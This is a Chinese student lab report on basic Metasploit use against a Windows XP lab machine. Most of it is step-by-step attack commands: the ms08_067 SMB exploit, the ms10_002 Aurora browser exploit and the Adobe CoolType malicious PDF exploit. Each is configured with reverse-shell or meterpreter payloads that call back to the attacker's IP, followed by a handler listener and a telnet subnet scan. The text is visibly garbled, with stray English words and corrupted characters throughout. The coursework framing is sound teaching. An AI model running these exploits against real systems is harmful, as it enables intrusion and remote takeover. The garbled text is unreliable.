Exp5 MSF基础应用 20164314

1、实践内容shell

   本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:windows

  1.一个主动攻击实践,如ms08_067; (成功)api

  2.一个针对浏览器的攻击,如ms11_050;(成功)浏览器

  3. 一个针对客户端的攻击,如Adobe;(成功)服务器

  4.成功应用任何一个辅助模块。(成功且惟一)tcp

2、实践过程编码

准备工做:首先先肯定Linux和XP的IPspa

Linux:222.28.133.163d

XP:222.28.133.242code

 

1.实现主动攻击,这里使用的是ms08_067漏洞

(1)首先进入msf平台,查找这个漏洞,能够看到他的具体目录来进行使用

 

(2)输入指令 use exploit/windows/smb/ms08_067_netapi,而后使用 show payloads 查看可使用的payload,选择一个use后,能够经过 show options 查看须要设置的具体参数

 

(3)配置参数

         输入指令 set payload generic/shell_reverse_tcp

        设置攻击机ip  set LHOST 222.28.133.16 

        设置攻击端口  set LPORT 4314 

        设置靶机ip  set RHOST 222.28.133.242 

        设置自动选择目标系统类型  set target 0

(4)设置完成后就能够执行了,能够看到,已经得到了xp的权限

 

2.实现针对浏览器的攻击,这里使用的是ms10_002漏洞

(1)查找这个漏洞,查看他的具体目录,使用后查看可使用的payload

(2)使用指令 use exploit/windows/browser/ms10_002_aurora  

    选择一个payload  set payloads windows/meterpreter/reverse_http 

         设置相关参数,

          set lhost 222.28.133.16攻击方IP;

     set lport 4314 攻击方端口;

          set target 0 

          set uripath gly 资源标识符路径设置;

 

(3) exploit 后,能够看到生成了一个URL,可是这里显示的 0.0.0.0 实际是本机ip,因此应该使用的是 Local IP 做为攻击的连接

 

(4)在xp系统里访问连接  http://222.28.133.16:8080/gly ,能够看到,kali获取了xp的权限

3.实现针对客户端的攻击

(1)输入指令 use windows/fileformat/adobe_cooltype_sing 

(2)配置渗透攻击所需的配置项:

  设置载荷: set payload windows/meterpreter/reverse_tcp 

  设置攻击机IP: set LHOST 222.28.133.16 

  设置端口: set LPORT 4314 

  设置产生的文件: set FILENAME 4314.pdf 

  设置完成后键入 exploit

(3)根据路径找到该pdf文件放到靶机里。

根据路径发现找不到对应的文件,由于目录是 .的,是一个隐藏目录,因此咱们要设置查看隐藏文件后,找到具体文件

(4)使用命令 back 退出当前模块,启动一个对应于载荷的监听端,等待靶机回连

输入:

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 222.28.133.16
set lport 4314

(5)在靶机中打开该pdf,回连成功

4.应用scanner辅助模块(惟一)

(1)先 search scanner 查看可使用的具体模块

(2)选择一个 telnet_version模块使用

       (telnet_version辅助模块将扫描子网和指纹识别正在运行的任何远程登陆服务器)

         输入指令 use auxiliary/scanner/telnet/telnet_version 

         输入指令 show options ,查看须要设置的具体参数;

(3)参数配置

输入如下指令,

set RHOSTS 222.28.133.0/24
set RPORT 4314
set THREADS 254

 

(4)运行之后,获得如下结果,

 

3、基础问题回答

用本身的话解释什么是exploit,payload,encode.

       我认为exploit就是执行、开采,利用漏洞对靶机进行相应的攻击;payload就是漏洞攻击的有效载荷,是漏洞攻击的手段,是漏洞攻击成功必要的载体;encode就是编码器,就是对攻击进行假装。

4、实验总结与体会

       经过此次实验,咱们见识到了msf平台的厉害,不只能够利用多种辅助模块获取靶机信息,还可以查看大部分存在的漏洞并利用这些漏洞实现不一样攻击,这里面,直接实现主动攻击是最恐怖的,只要系统存在这个漏洞,就会被直接攻破,看来,实时更新系统是颇有必要的。

相关文章
相关标签/搜索